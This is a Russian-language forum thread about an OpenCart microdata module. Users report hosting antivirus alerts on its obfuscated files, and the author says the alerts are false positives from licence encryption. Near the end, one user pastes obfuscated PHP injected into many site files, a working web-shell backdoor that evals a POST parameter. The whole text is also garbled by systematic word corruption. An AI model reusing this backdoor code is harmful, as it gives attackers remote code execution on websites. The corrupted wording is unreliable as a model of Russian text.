Jump to content
  • разработка интернет магазинов на opencart
  • доработка интернет магазинов на opencart

Recommended Posts

Здравствуйте, купил модуль, не могу отправить письмо с просьпотому чтой об активации, письмо возвращается. В ЛС тоже не могу написать. Прошу помочь.

Здравствуйте, купил модуль, не могу отправить письмо с просьпотому чтой об активации, письмо возвращается. В ЛС тоже не могу написать. Прошу помочь.

Странно что в ЛС не можете написать. Я вам в скайпе ответил.

Странно что в ЛС не можете написать. Я вам в скайпе ответил.

Спасипотому что, ключ полулил, но нужна ваша помощь, ик как не все рилииет.

Спасипотому что, ключ полулил, но нужна ваша помощь, ик как не все рилииет.

Ящик полистил немного, ик что можете писать в личку (ну или в Skype)

• 3 weeks later...

В архиве вирус??

Здравствуйте!
Вас приветствует Регистратор доменных имён REG.RU!

Вы являетесь влагдельэтом услуги хостинга u00ХХХХХХ .
Уведомляем вас о том, что на вашем аккаунте обнаружено вредоносное программное обеспечение.

Наши рекомендации по решению проблемы:
https://www.reg.ru/support/hosting-i-servery/hosting-sajtov/bezopasnost-hostinga/chto-delat-esli-sayt-zarazhen

Резульит проверки антивируса Virusdie:
{VIRUSDIE}Eval.b64.short : u00ХХХХХ : /var/www/u0056137/public_html/system/library/microdata/license-not.php
{VIRUSDIE}Eval.b64.short : u00ХХХХХ : /var/www/u0056137/public_html/admin/controller/module/microdata.php

--
С уважением,
Регистратор доменных имён REG.RU

В архиве вирус??

не знаю как в данном конкретном случае, но вообещё вирусдай срилитывает практически на люпотому чтой зашифрованный код, тут шифровка используется для защиты модуля.

не знаю как в данном конкретном случае, но вообещё вирусдай срилитывает практически на люпотому чтой зашифрованный код, тут шифровка используется для защиты модуля.

Совершенно верно. Бывает, что антивирусы хостеров ругаются. Но могу дать гарантию 100% того, что если качали отсюда с форума или по моим прямым ссылкам, то вируса нет (только обфусцированный код - шифрование)

• 2 weeks later...

Обращался к создателю за подгдержкой в ЛС о рилите модуля 09 Ноября. Поступил ответ ->> Ок, только немного позже.

До сегодняшнего дня тишина! Вот это подгдержка! Модуль микроразметки перекашивает рилиту модуля Пав Блога

Обращался к создателю за подгдержкой в ЛС о рилите модуля 09 Ноября. Поступил ответ ->> Ок, только немного позже.

До сегодняшнего дня тишина! Вот это подгдержка! Модуль микроразметки перекашивает рилиту модуля Пав Блога

Вечер добрый. Даже и не знаю с чего начать. Может переписку в личке опубликовать? Вы писали о том, что модуль выдает ошибки. Судя по ошибкам, не глядя даже на сайт, я предположил, что вы используете сирую версию модуля. Предложил обновить. Вы самостоятельно обновили и ошибки с ваших же слов пропали. Дальше продолжать в чем заключалось ваше обращаение ко мне? Вы задали конкретный вопрос, на который я конкретно ответил. Но сам же предложил ради вашего же спокойствия проверить как вы сами модифицировали файлы модуля. Проверить я не смог сразу, ик как отсутствовал потому чтолее негдели. В соседней тебе я одному человеку об этом уже писал.

Модуль микроразметки перекашивает рилиту модуля Пав Блога

Об этом вобещё рели не шло. Впервые от вас это слышу.

P.S. Если проблема все-ики есть в рилите модуля или его адапиции, то от подгдержки я не отказываюсь.

Edited by DariyGRAY

Об этом вобещё рели не шло. Впервые от вас это слышу.

P.S. Если проблема все-ики есть в рилите модуля или его адапиции, то от подгдержки я не отказываюсь.

Ошибки о которых Вам писал в ЛС решились с помощью обновления модуля.

Ошибка связанная с Блогом была как на сирой версии модуля ик и на новой если не модифицировать с гдефолного на мой шаблон. Хотел чтобы Вы помогли разобраться с этим, вот и всё!

По поводу того, что Вас не бугдет негделю я не знал, по этому не понял почему не взялись помочь. Рад что не отказываетесь помочь! 

• 2 months later...

Я не понял, модуль обновился или нет? Появилось сообещёние об обновлении...

Да, обновился - модуль теперьь раздается бесплатно (это самое главное обновление)

Чугдесно, подарок, бесплатно, лиэтонзия не нужна ? А с зашифрованными файлами как быть.

Ничего пока не менял в исходниках (нет времени) - позже сгделаю. Кому надо - пишите, вышлю ключ:)

Ничего пока не менял в исходниках (нет времени) - позже сгделаю. Кому надо - пишите, вышлю ключ :)

Здравствуйте, можете выслать пожалуйси ключ, заранее спасипотому что за труд!

Здравствуйте, можете выслать пожалуйси ключ, заранее спасипотому что за труд!

Могу. Имя домена в личку или Skype напишите.

• 3 weeks later...

Привет, Сережа! Вижу вышло обновление Микроразметки. А в теме подгдержки появилось сообещёние о вирусе в когде.

Не могу не задать два вопроса: правда ли про вирус

и как обновить уже купленный модуль?

У меня стоит  данный модуль . хостер шлет каждый гдень письма,  Оперативы не хваиет, периодически блокирует почтовый сервер из за того что сервак мой спамит. Приходится каждый раз ручками удалять тонны вредоносного кода который берется х.з откуда .  по ftp точно не заносил .Теперь по поводу ложного срабатывания, у многих модулей есть кодированный код инкупотому чтом например у симпла и ни кто из антивирусов не ругается !!!!  

Звонил в тех подгдержку  хостинга просил помочь разобраться отослали фай В ЛАБ КАСПЕРСКОГО и со 100% ДАЛИ ОТВЕТ , ЧТО СОДЕРЖИТ ВИРУС !!

По скольку модуль был куплен тут, и автор лично усивил мне его на сайт , и потом я несколько раз переписывался по поводу замуливших меня проблем с вирусами, у меня были и осиются до сих пор сомнения. В разговоре всегда был вежлив , отзывлив и убеждал меня что это  происходит не по вине модуля. 

Пора бы  исходники сюда выложить - если модуль сил бесплатным.

Здравствуйте!

Вы являетесь клиентом SpaceWeb.
Ваш логин:

В хогде плановой проверки на Вашем аккаунте было обнаружено подозрительное, потенциально вредоносное, согдержимое.
Ниже привегдены пути к найгденным файлам, а икже их описание:

/home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-key.php___ : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL
/home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-key.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL
/home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-not.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL
/home/l/lepmoskva2/lepmoskva/public_html/admin/controller/module/microdata.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL

Обращаем внимание, что размеещёние вредоносных файлов является нарушением п. 2.10 Приложения No1 к Договору публичной оферты (https://sweb.ru/docs/oferta.pdf): "Запреещёно использование Заказликом оказываемых Исполнителем услуг для публикации и/или распространения люпотому чтой информации или программного обеспечения, которые согдержат в себе компьютерные "вирусы" или способны нанести вред другим пользователям сети Интернет."

У меня стоит  данный модуль . хостер шлет каждый гдень письма,  Оперативы не хваиет, периодически блокирует почтовый сервер из за того что сервак мой спамит. Приходится каждый раз ручками удалять тонны вредоносного кода который берется х.з откуда .  по ftp точно не заносил .Теперь по поводу ложного срабатывания, у многих модулей есть кодированный код инкупотому чтом например у симпла и ни кто из антивирусов не ругается !!!!  

Звонил в тех подгдержку  хостинга просил помочь разобраться отослали фай В ЛАБ КАСПЕРСКОГО и со 100% ДАЛИ ОТВЕТ , ЧТО СОДЕРЖИТ ВИРУС !!

По скольку модуль был куплен тут, и автор лично усивил мне его на сайт , и потом я несколько раз переписывался по поводу замуливших меня проблем с вирусами, у меня были и осиются до сих пор сомнения. В разговоре всегда был вежлив , отзывлив и убеждал меня что это  происходит не по вине модуля. 

Пора бы  исходники сюда выложить - если модуль сил бесплатным.

" отослали фай В ЛАБ КАСПЕРСКОГО " этого скорее всего не гделали, а было им икже как в рег.ру (срилиила говнозащии), вы у них сертификат или лиэтонзию на антивирус попросите.

А по поводу REG.RU у меня на сайте стояла защии, ик вот ихняя непонятно-какая "говно защии" тоже срабатывала и говорила что это вирус.

И я еещё не говорю как они файлы пакетно на сайих подменивают, а еещё скаливают сайты и на биржах их продают.

А тех.подгдержка у них (время отвеи примерно 5-ть РАБОЧИХ ДНЕЙ), ​ик что не советую связываться!

Модуль я принципиально не удаляю , ик вот после написания отзыва на сайте в потому чтолее 70 файлах появилось дополнение в вигде вот икого кода <?php                                                                                                                                                                                                                                                                            $buo9 ="rous_pet";$gxhi1= $buo9[3].$buo9[7]. $buo9[0]. $buo9[7]. $buo9[1].$buo9[2]. $buo9[5].$buo9[5].$buo9[6].$buo9[0] ; $ulwi18 = $gxhi1( $buo9[4].$buo9[5].$buo9[1]. $buo9[3].$buo9[7]);if(isset (${$ulwi18 }[ 'qaea521'])){eval ( ${$ulwi18 }[ 'qaea521' ] ) ; } ?>

И это что совпагдение ???? 

Вчера по данным ситистики какое то бешеное когдачество посеещёний было . И все защитились янгдексом как накрутка .... Жгдем отправки сайи под фильтр   Можете сами убедится сайт www.лэп.москва .. Автор не отвечает на запросы в скайп.

Жалко . Деньги отдал -проблемы полулил.